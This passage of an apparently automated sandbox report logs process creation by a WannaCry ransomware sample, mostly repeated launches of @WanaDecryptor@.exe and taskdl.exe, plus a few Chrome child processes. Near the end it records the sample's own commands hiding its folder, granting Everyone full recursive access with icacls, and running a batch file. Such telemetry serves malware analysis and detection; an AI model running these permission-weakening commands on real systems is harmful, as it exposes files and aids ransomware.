              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exe @WanaDecryptor@.exe
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exe taskdl.exe
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exe @WanaDecryptor@.exe
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exe @WanaDecryptor@.exe
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exe @WanaDecryptor@.exe
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exe @WanaDecryptor@.exe
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exe taskdl.exe
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exe @WanaDecryptor@.exe
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exe @WanaDecryptor@.exe
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exe taskdl.exe
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exe @WanaDecryptor@.exe
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exe @WanaDecryptor@.exe
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exe taskdl.exe
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exe @WanaDecryptor@.exe
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exe @WanaDecryptor@.exe
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exe taskdl.exe
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exe @WanaDecryptor@.exe
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exe @WanaDecryptor@.exe
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exe taskdl.exe
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exe @WanaDecryptor@.exe
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exe @WanaDecryptor@.exe
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exe taskdl.exe
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exe @WanaDecryptor@.exe
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exe @WanaDecryptor@.exe
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exe @WanaDecryptor@.exe
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exe @WanaDecryptor@.exe
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exe taskdl.exe
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exe @WanaDecryptor@.exe
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exe @WanaDecryptor@.exe
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exe @WanaDecryptor@.exe
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exe @WanaDecryptor@.exe
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exe taskdl.exe
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exe @WanaDecryptor@.exe
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exe @WanaDecryptor@.exe
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exe taskdl.exe
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exe @WanaDecryptor@.exe
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exe @WanaDecryptor@.exe
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exe taskdl.exe
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exe @WanaDecryptor@.exe
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exe @WanaDecryptor@.exe
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exe @WanaDecryptor@.exe
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exe taskdl.exe
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exe @WanaDecryptor@.exe
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exe @WanaDecryptor@.exe
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exe taskdl.exe
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exe @WanaDecryptor@.exe
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exe @WanaDecryptor@.exe
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exe taskdl.exe
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exe @WanaDecryptor@.exe
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exe @WanaDecryptor@.exe
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exe @WanaDecryptor@.exe
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exe taskdl.exe
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exe @WanaDecryptor@.exe
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exe taskdl.exe
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exe @WanaDecryptor@.exe
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exe @WanaDecryptor@.exe
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exe taskdl.exe
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exe @WanaDecryptor@.exe
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exe @WanaDecryptor@.exe
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exe taskdl.exe
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exe taskdl.exe
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exe @WanaDecryptor@.exe
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exe @WanaDecryptor@.exe
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exe @WanaDecryptor@.exe
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exe taskdl.exe
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exe @WanaDecryptor@.exe
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exe @WanaDecryptor@.exe
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exe taskdl.exe
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exe @WanaDecryptor@.exe
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exe @WanaDecryptor@.exe
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exe taskdl.exe
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exe @WanaDecryptor@.exe
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exe @WanaDecryptor@.exe
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exe @WanaDecryptor@.exe
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exe taskdl.exe
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exe @WanaDecryptor@.exe
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exe taskdl.exe
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exe @WanaDecryptor@.exe
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exe @WanaDecryptor@.exe
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exe @WanaDecryptor@.exe
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exe taskdl.exe
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exe @WanaDecryptor@.exe
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exe @WanaDecryptor@.exe
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exe @WanaDecryptor@.exe
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exe @WanaDecryptor@.exe
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exe @WanaDecryptor@.exe
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2088 --field-trial-handle=1968,i,18163136596310937086,2943385894762523011,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8Jump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exe taskdl.exeJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: C:\Windows\SysWOW64\attrib.exe attrib +h .Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: C:\Windows\SysWOW64\icacls.exe icacls . /grant Everyone:F /T /C /QJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exe taskdl.exeJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exe taskdl.exeJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c 58191711205328.batJump to behavior
